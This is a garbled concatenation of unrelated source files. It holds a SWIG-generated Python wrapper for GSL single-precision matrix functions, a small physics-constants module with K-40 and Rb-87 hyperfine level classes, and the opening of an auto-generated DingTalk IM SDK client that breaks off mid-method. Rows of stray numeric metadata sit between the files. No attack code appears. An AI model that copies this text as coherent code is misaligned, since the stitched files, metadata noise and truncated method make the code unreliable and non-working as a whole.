    __swig_getmethods__["size1"] = _matrix.gsl_matrix_float_size1_get
    if _newclass:
        size1 = _swig_property(_matrix.gsl_matrix_float_size1_get, _matrix.gsl_matrix_float_size1_set)
    __swig_setmethods__["size2"] = _matrix.gsl_matrix_float_size2_set
    __swig_getmethods__["size2"] = _matrix.gsl_matrix_float_size2_get
    if _newclass:
        size2 = _swig_property(_matrix.gsl_matrix_float_size2_get, _matrix.gsl_matrix_float_size2_set)
    __swig_setmethods__["tda"] = _matrix.gsl_matrix_float_tda_set
    __swig_getmethods__["tda"] = _matrix.gsl_matrix_float_tda_get
    if _newclass:
        tda = _swig_property(_matrix.gsl_matrix_float_tda_get, _matrix.gsl_matrix_float_tda_set)
    __swig_setmethods__["data"] = _matrix.gsl_matrix_float_data_set
    __swig_getmethods__["data"] = _matrix.gsl_matrix_float_data_get
    if _newclass:
        data = _swig_property(_matrix.gsl_matrix_float_data_get, _matrix.gsl_matrix_float_data_set)
    __swig_setmethods__["block"] = _matrix.gsl_matrix_float_block_set
    __swig_getmethods__["block"] = _matrix.gsl_matrix_float_block_get
    if _newclass:
        block = _swig_property(_matrix.gsl_matrix_float_block_get, _matrix.gsl_matrix_float_block_set)
    __swig_setmethods__["owner"] = _matrix.gsl_matrix_float_owner_set
    __swig_getmethods__["owner"] = _matrix.gsl_matrix_float_owner_get
    if _newclass:
        owner = _swig_property(_matrix.gsl_matrix_float_owner_get, _matrix.gsl_matrix_float_owner_set)
    def __init__(self, m, n):
        """Allocate an m x n single-precision matrix at the C level."""
        this = _matrix.new_gsl_matrix_float(m, n)
        try:
            # Newer SWIG keeps a list of owned pointers on self.this.
            self.this.append(this)
        except __builtin__.Exception:
            # Older SWIG: self.this is the pointer itself.
            self.this = this
    __swig_destroy__ = _matrix.delete_gsl_matrix_float
    __del__ = lambda self: None
    def nrows(self):
        """Return the number of rows (size1)."""
        return _matrix.gsl_matrix_float_nrows(self)
    def ncols(self):
        """Return the number of columns (size2)."""
        return _matrix.gsl_matrix_float_ncols(self)
    def __getitem__(self, m, n):
        # NOTE(review): generated signature takes two index arguments; how
        # SWIG maps Python's single subscript key onto (m, n) is handled by
        # the C wrapper — confirm the intended calling convention before use.
        return _matrix.gsl_matrix_float___getitem__(self, m, n)
    def __setitem__(self, item, n, m):
        # NOTE(review): same caveat as __getitem__ regarding the extra args.
        return _matrix.gsl_matrix_float___setitem__(self, item, n, m)
# Register the proxy class with the SWIG runtime type system.
gsl_matrix_float_swigregister = _matrix.gsl_matrix_float_swigregister
gsl_matrix_float_swigregister(gsl_matrix_float)
class _gsl_matrix_float_view(_object):
    """SWIG proxy for the C struct gsl_matrix_float_view (auto-generated)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_float_view, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_float_view, name)
    __repr__ = _swig_repr
    # Expose the embedded 'matrix' member via the generated C accessors.
    __swig_setmethods__["matrix"] = _matrix._gsl_matrix_float_view_matrix_set
    __swig_getmethods__["matrix"] = _matrix._gsl_matrix_float_view_matrix_get
    if _newclass:
        matrix = _swig_property(_matrix._gsl_matrix_float_view_matrix_get, _matrix._gsl_matrix_float_view_matrix_set)
    def __init__(self):
        """Allocate a new, empty C-level gsl_matrix_float_view and wrap it."""
        this = _matrix.new__gsl_matrix_float_view()
        try:
            # Newer SWIG keeps a list of owned pointers on self.this.
            self.this.append(this)
        except __builtin__.Exception:
            # Older SWIG: self.this is the pointer itself.
            self.this = this
    __swig_destroy__ = _matrix.delete__gsl_matrix_float_view
    __del__ = lambda self: None
# Register the proxy class with the SWIG runtime type system.
_gsl_matrix_float_view_swigregister = _matrix._gsl_matrix_float_view_swigregister
_gsl_matrix_float_view_swigregister(_gsl_matrix_float_view)
class _gsl_matrix_float_const_view(_object):
    """SWIG proxy for the C struct gsl_matrix_float_const_view (auto-generated)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_float_const_view, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_float_const_view, name)
    __repr__ = _swig_repr
    # Expose the embedded 'matrix' member via the generated C accessors.
    __swig_setmethods__["matrix"] = _matrix._gsl_matrix_float_const_view_matrix_set
    __swig_getmethods__["matrix"] = _matrix._gsl_matrix_float_const_view_matrix_get
    if _newclass:
        matrix = _swig_property(_matrix._gsl_matrix_float_const_view_matrix_get, _matrix._gsl_matrix_float_const_view_matrix_set)
    def __init__(self):
        """Allocate a new, empty C-level gsl_matrix_float_const_view and wrap it."""
        this = _matrix.new__gsl_matrix_float_const_view()
        try:
            # Newer SWIG keeps a list of owned pointers on self.this.
            self.this.append(this)
        except __builtin__.Exception:
            # Older SWIG: self.this is the pointer itself.
            self.this = this
    __swig_destroy__ = _matrix.delete__gsl_matrix_float_const_view
    __del__ = lambda self: None
# Register the proxy class with the SWIG runtime type system.
_gsl_matrix_float_const_view_swigregister = _matrix._gsl_matrix_float_const_view_swigregister
_gsl_matrix_float_const_view_swigregister(_gsl_matrix_float_const_view)
# ---------------------------------------------------------------------------
# Flat wrappers for the single-precision gsl_matrix_float C API.  Same
# generated pattern as the double-precision wrappers above: each stub is
# immediately rebound to the C entry point in _matrix.
# ---------------------------------------------------------------------------
# -- allocation / deallocation --
def gsl_matrix_float_alloc(n1, n2):
    return _matrix.gsl_matrix_float_alloc(n1, n2)
gsl_matrix_float_alloc = _matrix.gsl_matrix_float_alloc
def gsl_matrix_float_calloc(n1, n2):
    return _matrix.gsl_matrix_float_calloc(n1, n2)
gsl_matrix_float_calloc = _matrix.gsl_matrix_float_calloc
def gsl_matrix_float_alloc_from_block(b, offset, n1, n2, d2):
    return _matrix.gsl_matrix_float_alloc_from_block(b, offset, n1, n2, d2)
gsl_matrix_float_alloc_from_block = _matrix.gsl_matrix_float_alloc_from_block
def gsl_matrix_float_alloc_from_matrix(m, k1, k2, n1, n2):
    return _matrix.gsl_matrix_float_alloc_from_matrix(m, k1, k2, n1, n2)
gsl_matrix_float_alloc_from_matrix = _matrix.gsl_matrix_float_alloc_from_matrix
def gsl_vector_float_alloc_row_from_matrix(m, i):
    return _matrix.gsl_vector_float_alloc_row_from_matrix(m, i)
gsl_vector_float_alloc_row_from_matrix = _matrix.gsl_vector_float_alloc_row_from_matrix
def gsl_vector_float_alloc_col_from_matrix(m, j):
    return _matrix.gsl_vector_float_alloc_col_from_matrix(m, j)
gsl_vector_float_alloc_col_from_matrix = _matrix.gsl_vector_float_alloc_col_from_matrix
def gsl_matrix_float_free(m):
    return _matrix.gsl_matrix_float_free(m)
gsl_matrix_float_free = _matrix.gsl_matrix_float_free
# -- views (mutable and const) over matrices, vectors and raw arrays --
def gsl_matrix_float_submatrix(m, i, j, n1, n2):
    return _matrix.gsl_matrix_float_submatrix(m, i, j, n1, n2)
gsl_matrix_float_submatrix = _matrix.gsl_matrix_float_submatrix
def gsl_matrix_float_row(m, i):
    return _matrix.gsl_matrix_float_row(m, i)
gsl_matrix_float_row = _matrix.gsl_matrix_float_row
def gsl_matrix_float_column(m, j):
    return _matrix.gsl_matrix_float_column(m, j)
gsl_matrix_float_column = _matrix.gsl_matrix_float_column
def gsl_matrix_float_diagonal(m):
    return _matrix.gsl_matrix_float_diagonal(m)
gsl_matrix_float_diagonal = _matrix.gsl_matrix_float_diagonal
def gsl_matrix_float_subdiagonal(m, k):
    return _matrix.gsl_matrix_float_subdiagonal(m, k)
gsl_matrix_float_subdiagonal = _matrix.gsl_matrix_float_subdiagonal
def gsl_matrix_float_superdiagonal(m, k):
    return _matrix.gsl_matrix_float_superdiagonal(m, k)
gsl_matrix_float_superdiagonal = _matrix.gsl_matrix_float_superdiagonal
def gsl_matrix_float_subrow(m, i, offset, n):
    return _matrix.gsl_matrix_float_subrow(m, i, offset, n)
gsl_matrix_float_subrow = _matrix.gsl_matrix_float_subrow
def gsl_matrix_float_subcolumn(m, j, offset, n):
    return _matrix.gsl_matrix_float_subcolumn(m, j, offset, n)
gsl_matrix_float_subcolumn = _matrix.gsl_matrix_float_subcolumn
def gsl_matrix_float_view_array(base, n1, n2):
    return _matrix.gsl_matrix_float_view_array(base, n1, n2)
gsl_matrix_float_view_array = _matrix.gsl_matrix_float_view_array
def gsl_matrix_float_view_array_with_tda(base, n1, n2, tda):
    return _matrix.gsl_matrix_float_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_float_view_array_with_tda = _matrix.gsl_matrix_float_view_array_with_tda
def gsl_matrix_float_view_vector(v, n1, n2):
    return _matrix.gsl_matrix_float_view_vector(v, n1, n2)
gsl_matrix_float_view_vector = _matrix.gsl_matrix_float_view_vector
def gsl_matrix_float_view_vector_with_tda(v, n1, n2, tda):
    return _matrix.gsl_matrix_float_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_float_view_vector_with_tda = _matrix.gsl_matrix_float_view_vector_with_tda
def gsl_matrix_float_const_submatrix(m, i, j, n1, n2):
    return _matrix.gsl_matrix_float_const_submatrix(m, i, j, n1, n2)
gsl_matrix_float_const_submatrix = _matrix.gsl_matrix_float_const_submatrix
def gsl_matrix_float_const_row(m, i):
    return _matrix.gsl_matrix_float_const_row(m, i)
gsl_matrix_float_const_row = _matrix.gsl_matrix_float_const_row
def gsl_matrix_float_const_column(m, j):
    return _matrix.gsl_matrix_float_const_column(m, j)
gsl_matrix_float_const_column = _matrix.gsl_matrix_float_const_column
def gsl_matrix_float_const_diagonal(m):
    return _matrix.gsl_matrix_float_const_diagonal(m)
gsl_matrix_float_const_diagonal = _matrix.gsl_matrix_float_const_diagonal
def gsl_matrix_float_const_subdiagonal(m, k):
    return _matrix.gsl_matrix_float_const_subdiagonal(m, k)
gsl_matrix_float_const_subdiagonal = _matrix.gsl_matrix_float_const_subdiagonal
def gsl_matrix_float_const_superdiagonal(m, k):
    return _matrix.gsl_matrix_float_const_superdiagonal(m, k)
gsl_matrix_float_const_superdiagonal = _matrix.gsl_matrix_float_const_superdiagonal
def gsl_matrix_float_const_subrow(m, i, offset, n):
    return _matrix.gsl_matrix_float_const_subrow(m, i, offset, n)
gsl_matrix_float_const_subrow = _matrix.gsl_matrix_float_const_subrow
def gsl_matrix_float_const_subcolumn(m, j, offset, n):
    return _matrix.gsl_matrix_float_const_subcolumn(m, j, offset, n)
gsl_matrix_float_const_subcolumn = _matrix.gsl_matrix_float_const_subcolumn
def gsl_matrix_float_const_view_array(base, n1, n2):
    return _matrix.gsl_matrix_float_const_view_array(base, n1, n2)
gsl_matrix_float_const_view_array = _matrix.gsl_matrix_float_const_view_array
def gsl_matrix_float_const_view_array_with_tda(base, n1, n2, tda):
    return _matrix.gsl_matrix_float_const_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_float_const_view_array_with_tda = _matrix.gsl_matrix_float_const_view_array_with_tda
def gsl_matrix_float_const_view_vector(v, n1, n2):
    return _matrix.gsl_matrix_float_const_view_vector(v, n1, n2)
gsl_matrix_float_const_view_vector = _matrix.gsl_matrix_float_const_view_vector
def gsl_matrix_float_const_view_vector_with_tda(v, n1, n2, tda):
    return _matrix.gsl_matrix_float_const_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_float_const_view_vector_with_tda = _matrix.gsl_matrix_float_const_view_vector_with_tda
# -- whole-matrix initialization --
def gsl_matrix_float_set_zero(m):
    return _matrix.gsl_matrix_float_set_zero(m)
gsl_matrix_float_set_zero = _matrix.gsl_matrix_float_set_zero
def gsl_matrix_float_set_identity(m):
    return _matrix.gsl_matrix_float_set_identity(m)
gsl_matrix_float_set_identity = _matrix.gsl_matrix_float_set_identity
def gsl_matrix_float_set_all(m, x):
    return _matrix.gsl_matrix_float_set_all(m, x)
gsl_matrix_float_set_all = _matrix.gsl_matrix_float_set_all
# -- binary / formatted I/O --
def gsl_matrix_float_fread(stream, m):
    return _matrix.gsl_matrix_float_fread(stream, m)
gsl_matrix_float_fread = _matrix.gsl_matrix_float_fread
def gsl_matrix_float_fwrite(stream, m):
    return _matrix.gsl_matrix_float_fwrite(stream, m)
gsl_matrix_float_fwrite = _matrix.gsl_matrix_float_fwrite
def gsl_matrix_float_fscanf(stream, m):
    return _matrix.gsl_matrix_float_fscanf(stream, m)
gsl_matrix_float_fscanf = _matrix.gsl_matrix_float_fscanf
def gsl_matrix_float_fprintf(stream, m, format):
    return _matrix.gsl_matrix_float_fprintf(stream, m, format)
gsl_matrix_float_fprintf = _matrix.gsl_matrix_float_fprintf
# -- copying, swapping and transposition --
def gsl_matrix_float_memcpy(dest, src):
    return _matrix.gsl_matrix_float_memcpy(dest, src)
gsl_matrix_float_memcpy = _matrix.gsl_matrix_float_memcpy
def gsl_matrix_float_swap(m1, m2):
    return _matrix.gsl_matrix_float_swap(m1, m2)
gsl_matrix_float_swap = _matrix.gsl_matrix_float_swap
def gsl_matrix_float_tricpy(uplo_src, copy_diag, dest, src):
    return _matrix.gsl_matrix_float_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_float_tricpy = _matrix.gsl_matrix_float_tricpy
def gsl_matrix_float_swap_rows(m, i, j):
    return _matrix.gsl_matrix_float_swap_rows(m, i, j)
gsl_matrix_float_swap_rows = _matrix.gsl_matrix_float_swap_rows
def gsl_matrix_float_swap_columns(m, i, j):
    return _matrix.gsl_matrix_float_swap_columns(m, i, j)
gsl_matrix_float_swap_columns = _matrix.gsl_matrix_float_swap_columns
def gsl_matrix_float_swap_rowcol(m, i, j):
    return _matrix.gsl_matrix_float_swap_rowcol(m, i, j)
gsl_matrix_float_swap_rowcol = _matrix.gsl_matrix_float_swap_rowcol
def gsl_matrix_float_transpose(m):
    return _matrix.gsl_matrix_float_transpose(m)
gsl_matrix_float_transpose = _matrix.gsl_matrix_float_transpose
def gsl_matrix_float_transpose_memcpy(dest, src):
    return _matrix.gsl_matrix_float_transpose_memcpy(dest, src)
gsl_matrix_float_transpose_memcpy = _matrix.gsl_matrix_float_transpose_memcpy
def gsl_matrix_float_transpose_tricpy(uplo_src, copy_diag, dest, src):
    return _matrix.gsl_matrix_float_transpose_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_float_transpose_tricpy = _matrix.gsl_matrix_float_transpose_tricpy
# -- reductions (extrema and their indices) --
def gsl_matrix_float_max(m):
    return _matrix.gsl_matrix_float_max(m)
gsl_matrix_float_max = _matrix.gsl_matrix_float_max
def gsl_matrix_float_min(m):
    return _matrix.gsl_matrix_float_min(m)
gsl_matrix_float_min = _matrix.gsl_matrix_float_min
def gsl_matrix_float_minmax(m, min_out, max_out):
    return _matrix.gsl_matrix_float_minmax(m, min_out, max_out)
gsl_matrix_float_minmax = _matrix.gsl_matrix_float_minmax
def gsl_matrix_float_max_index(m, imax, jmax):
    return _matrix.gsl_matrix_float_max_index(m, imax, jmax)
gsl_matrix_float_max_index = _matrix.gsl_matrix_float_max_index
def gsl_matrix_float_min_index(m, imin, jmin):
    return _matrix.gsl_matrix_float_min_index(m, imin, jmin)
gsl_matrix_float_min_index = _matrix.gsl_matrix_float_min_index
def gsl_matrix_float_minmax_index(m, imin, jmin, imax, jmax):
    return _matrix.gsl_matrix_float_minmax_index(m, imin, jmin, imax, jmax)
gsl_matrix_float_minmax_index = _matrix.gsl_matrix_float_minmax_index
# -- predicates --
def gsl_matrix_float_equal(a, b):
    return _matrix.gsl_matrix_float_equal(a, b)
gsl_matrix_float_equal = _matrix.gsl_matrix_float_equal
def gsl_matrix_float_isnull(m):
    return _matrix.gsl_matrix_float_isnull(m)
gsl_matrix_float_isnull = _matrix.gsl_matrix_float_isnull
def gsl_matrix_float_ispos(m):
    return _matrix.gsl_matrix_float_ispos(m)
gsl_matrix_float_ispos = _matrix.gsl_matrix_float_ispos
def gsl_matrix_float_isneg(m):
    return _matrix.gsl_matrix_float_isneg(m)
gsl_matrix_float_isneg = _matrix.gsl_matrix_float_isneg
def gsl_matrix_float_isnonneg(m):
    return _matrix.gsl_matrix_float_isnonneg(m)
gsl_matrix_float_isnonneg = _matrix.gsl_matrix_float_isnonneg
# -- element-wise arithmetic (in place on the first operand) --
def gsl_matrix_float_add(a, b):
    return _matrix.gsl_matrix_float_add(a, b)
gsl_matrix_float_add = _matrix.gsl_matrix_float_add
def gsl_matrix_float_sub(a, b):
    return _matrix.gsl_matrix_float_sub(a, b)
gsl_matrix_float_sub = _matrix.gsl_matrix_float_sub
def gsl_matrix_float_mul_elements(a, b):
    return _matrix.gsl_matrix_float_mul_elements(a, b)
gsl_matrix_float_mul_elements = _matrix.gsl_matrix_float_mul_elements
def gsl_matrix_float_div_elements(a, b):
    return _matrix.gsl_matrix_float_div_elements(a, b)
gsl_matrix_float_div_elements = _matrix.gsl_matrix_float_div_elements
def gsl_matrix_float_scale(a, x):
    return _matrix.gsl_matrix_float_scale(a, x)
gsl_matrix_float_scale = _matrix.gsl_matrix_float_scale
def gsl_matrix_float_add_constant(a, x):
    return _matrix.gsl_matrix_float_add_constant(a, x)
gsl_matrix_float_add_constant = _matrix.gsl_matrix_float_add_constant
def gsl_matrix_float_add_diagonal(a, x):
    return _matrix.gsl_matrix_float_add_diagonal(a, x)
gsl_matrix_float_add_diagonal = _matrix.gsl_matrix_float_add_diagonal
# -- row/column and single-element access --
def gsl_matrix_float_get_row(v, m, i):
    return _matrix.gsl_matrix_float_get_row(v, m, i)
gsl_matrix_float_get_row = _matrix.gsl_matrix_float_get_row
def gsl_matrix_float_get_col(v, m, j):
    return _matrix.gsl_matrix_float_get_col(v, m, j)
gsl_matrix_float_get_col = _matrix.gsl_matrix_float_get_col
def gsl_matrix_float_set_row(m, i, v):
    return _matrix.gsl_matrix_float_set_row(m, i, v)
gsl_matrix_float_set_row = _matrix.gsl_matrix_float_set_row
def gsl_matrix_float_set_col(m, j, v):
    return _matrix.gsl_matrix_float_set_col(m, j, v)
gsl_matrix_float_set_col = _matrix.gsl_matrix_float_set_col
def gsl_matrix_float_get(m, i, j):
    return _matrix.gsl_matrix_float_get(m, i, j)
gsl_matrix_float_get = _matrix.gsl_matrix_float_get
def gsl_matrix_float_set(m, i, j, x):
    return _matrix.gsl_matrix_float_set(m, i, j, x)
gsl_matrix_float_set = _matrix.gsl_matrix_float_set
def gsl_matrix_float_ptr(m, i, j):
    return _matrix.gsl_matrix_float_ptr(m, i, j)
gsl_matrix_float_ptr = _matrix.gsl_matrix_float_ptr
def gsl_matrix_float_const_ptr(m, i, j):
    return _matrix.gsl_matrix_float_const_ptr(m, i, j)
gsl_matrix_float_const_ptr = _matrix.gsl_matrix_float_const_ptr
# -- non-GSL convenience extensions provided by this wrapper module --
def gsl_matrix_float_load(m, filename, old=False):
    return _matrix.gsl_matrix_float_load(m, filename, old)
gsl_matrix_float_load = _matrix.gsl_matrix_float_load
def gsl_matrix_float_resize(m, size1, size2):
    return _matrix.gsl_matrix_float_resize(m, size1, size2)
gsl_matrix_float_resize = _matrix.gsl_matrix_float_resize
# This file is compatible with both classic and new-style classes.
| 39.460067
| 129
| 0.796978
| 5,468
| 35,080
| 4.472385
| 0.040234
| 0.258352
| 0.224494
| 0.151298
| 0.882151
| 0.730117
| 0.601349
| 0.477857
| 0.32615
| 0.254467
| 0
| 0.005918
| 0.128107
| 35,080
| 888
| 130
| 39.504505
| 0.793631
| 0.008409
| 0
| 0.157143
| 1
| 0
| 0.008684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.24
| false
| 0.002857
| 0.027143
| 0.224286
| 0.575714
| 0.008571
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
b385bf3c79066a539bb289577e02a20ed3586d01
| 3,918
|
py
|
Python
|
spin_tools/physics/constants.py
|
jaywalker9999/spin_tools
|
0f730234a1fae49aecb8cbc5b0eeb28e64832e96
|
[
"MIT"
] | null | null | null |
spin_tools/physics/constants.py
|
jaywalker9999/spin_tools
|
0f730234a1fae49aecb8cbc5b0eeb28e64832e96
|
[
"MIT"
] | null | null | null |
spin_tools/physics/constants.py
|
jaywalker9999/spin_tools
|
0f730234a1fae49aecb8cbc5b0eeb28e64832e96
|
[
"MIT"
] | null | null | null |
# Physical constants (SI units, CODATA 2018).
e = 1.602176634e-19  # elementary charge, C (exact by SI definition)
m_e = 9.1093837015e-31  # electron mass, kg  (fixed comment typo: was "keg")
m_p = 1.67262192369e-27  # proton mass, kg
h = 6.62607015e-34  # Planck constant, m^2 kg / s (exact by SI definition)
# BUGFIX: was the truncated 1.0545718e-34, inconsistent with the exact h
# above; use the CODATA value of h/(2*pi) so derived magnetons are accurate.
hbar = 1.054571817e-34  # reduced Planck constant, m^2 kg / s
mu_bohr = e*hbar/(2*m_e)  # Bohr magneton, J/T
mu_nuclear = e*hbar/(2*m_p)  # nuclear magneton, J/T
g_L = 0.99998627  # electron orbital g-factor
g_e = 2.0023193043737  # electron spin g-factor
def get_g_J(atom):
    """Return the Lande g-factor g_J of a fine-structure level.

    Standard LS-coupling expression built from the orbital (g_L) and spin
    (g_e) electron g-factors.  `atom` must expose the quantum numbers J, L
    and S as attributes; J must be non-zero (J = 0 divides by zero, as in
    the original formula).
    """
    jj = atom.J*(atom.J+1)
    ll = atom.L*(atom.L+1)
    ss = atom.S*(atom.S+1)
    return (g_L * (jj - ss + ll) + g_e * (jj + ss - ll)) / (2*jj)
class K40:
    """Potassium-40: spin quantum numbers and nuclear g-factor common to
    every fine-structure level of the isotope."""

    def __init__(self):
        # Nuclear g-factor, nuclear spin, electron spin.
        self.g_I = 0.000176490
        self.I = 4
        self.S = 1/2
class K40_4S_J12(K40):
    """4S_1/2 ground fine-structure level of K-40."""
    def __init__(self):
        super().__init__()
        self.L = 0
        self.J = 1/2
        self.g_J = get_g_J(self)  # Lande g-factor; needs L, J (and inherited S) set first
        self.a_hf = -285.7308*1e6 # magnetic-dipole hyperfine constant, h * Hz
        self.delta_E_hf = self.a_hf * (self.I+0.5) # ground-state hyperfine splitting, Hz
        self.b_hf = 0  # no quadrupole term for J = 1/2
# class K40_4S_J12_F92(K40):
# def __init__(self):
# super().__init__()
# self.L = 0
# # self.S = 1/2
# self.J = 1/2
# # self.I = 4
# self.F = 9/2
# # self.g_I = 0.000176490
# self.g_J = get_g_J(self)
# self.a_hf = -285.7308*1e6 # h * Hz
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
# class K40_4S_J12_F72(K40):
# def __init__(self):
# super().__init__()
# self.L = 0
# # self.S = 1/2
# self.J = 1/2
# # self.I = 4
# self.F = 7/2
# # self.g_I = 0.000176490
# self.g_J = get_g_J(self)
# self.a_hf = -285.7308*1e6 # h * Hz
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
class K40_4P_J32(K40):
    """4P_3/2 excited fine-structure level of K-40 (D2 line)."""
    def __init__(self):
        super().__init__()
        self.L = 1
        self.J = 3/2
        self.g_J = get_g_J(self)  # Lande g-factor; needs L, J (and inherited S) set first
        self.a_hf = -7.585*1e6  # hyperfine A constant; presumably h * Hz like the S-state values — confirm
        self.b_hf = -3.445*1e6  # hyperfine B constant; presumably h * Hz — confirm
########################################################################################
class Rb87:
    """Rubidium-87: spin quantum numbers and nuclear g-factor common to
    every fine-structure level of the isotope."""

    def __init__(self):
        # Nuclear g-factor, nuclear spin, electron spin.
        self.g_I = -0.0009951414
        self.I = 3/2
        self.S = 1/2
class Rb87_5S_J12(Rb87):
    """5S_1/2 ground fine-structure level of Rb-87."""
    def __init__(self):
        super().__init__()
        self.L = 0
        self.J = 1/2
        self.g_J = get_g_J(self)  # Lande g-factor; needs L, J (and inherited S) set first
        self.a_hf = 3417.34130545215*1e6 # magnetic-dipole hyperfine constant, h * Hz
        self.delta_E_hf = self.a_hf * (self.I+0.5) # ground-state hyperfine splitting, Hz
        self.b_hf = 0  # no quadrupole term for J = 1/2
# class Rb87_5S_J12_F1(Rb87):
# def __init__(self):
# super().__init__()
# self.L = 0
# self.J = 1/2
# self.F = 1
# # self.g_I = 0.000176490
# self.g_J = g_L * (self.J*(self.J+1) - self.S*(self.S+1) + \
# self.L*(self.L+1))/(2*self.J*(self.J+1)) + \
# g_e * (self.J*(self.J+1) + self.S*(self.S+1) - \
# self.L*(self.L+1))/(2*self.J*(self.J+1))
# self.g_F = -1/2
# self.a_hf = 3417.34130545215*1e6 # h * Hz
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
# class Rb87_5S_J12_F2(Rb87):
# def __init__(self):
# super().__init__()
# self.L = 0
# self.J = 1/2
# self.F = 2
# # self.g_I = 0.000176490
# self.g_J = g_L * (self.J*(self.J+1) - self.S*(self.S+1) + \
# self.L*(self.L+1))/(2*self.J*(self.J+1)) + \
# g_e * (self.J*(self.J+1) + self.S*(self.S+1) - \
# self.L*(self.L+1))/(2*self.J*(self.J+1))
# self.g_F = 1/2
# self.a_hf = 3417.34130545215*1e6 # h
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
class Rb87_5P_J32(Rb87):
    """5P_3/2 excited fine-structure level of Rb-87 (D2 line)."""
    def __init__(self):
        super().__init__()
        self.L = 1
        self.J = 3/2
        self.g_J = get_g_J(self)  # Lande g-factor; needs L, J (and inherited S) set first
        self.a_hf = 84.7185*1e6 # magnetic-dipole hyperfine constant, h * Hz
        # BUGFIX: a_hf is already in Hz, but the original multiplied by an
        # extra 1e6, inflating delta_E_hf by 10^6 relative to the identical
        # computation in K40_4S_J12 and Rb87_5S_J12.
        self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
        self.b_hf = 12.4965*1e6 # hyperfine B constant; presumably h * Hz — confirm
| 27.398601
| 88
| 0.464523
| 664
| 3,918
| 2.480422
| 0.112952
| 0.07286
| 0.058288
| 0.077717
| 0.826351
| 0.805707
| 0.802672
| 0.802672
| 0.798421
| 0.769885
| 0
| 0.161839
| 0.339204
| 3,918
| 143
| 89
| 27.398601
| 0.474314
| 0.499234
| 0
| 0.474576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.118644
| false
| 0
| 0
| 0.016949
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b3da9c815a4868ca0e4606c1fd6c87c6103397db
| 83,154
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/im_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/im_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/im_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.im_1_0 import models as dingtalkim__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
self,
config: open_api_models.Config,
):
super().__init__(config)
self._endpoint_rule = ''
if UtilClient.empty(self._endpoint):
self._endpoint = 'api.dingtalk.com'
def topbox_close(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxCloseHeaders()
return self.topbox_close_with_options(request, headers, runtime)
async def topbox_close_async(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxCloseHeaders()
return await self.topbox_close_with_options_async(request, headers, runtime)
def topbox_close_with_options(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
headers: dingtalkim__1__0_models.TopboxCloseHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
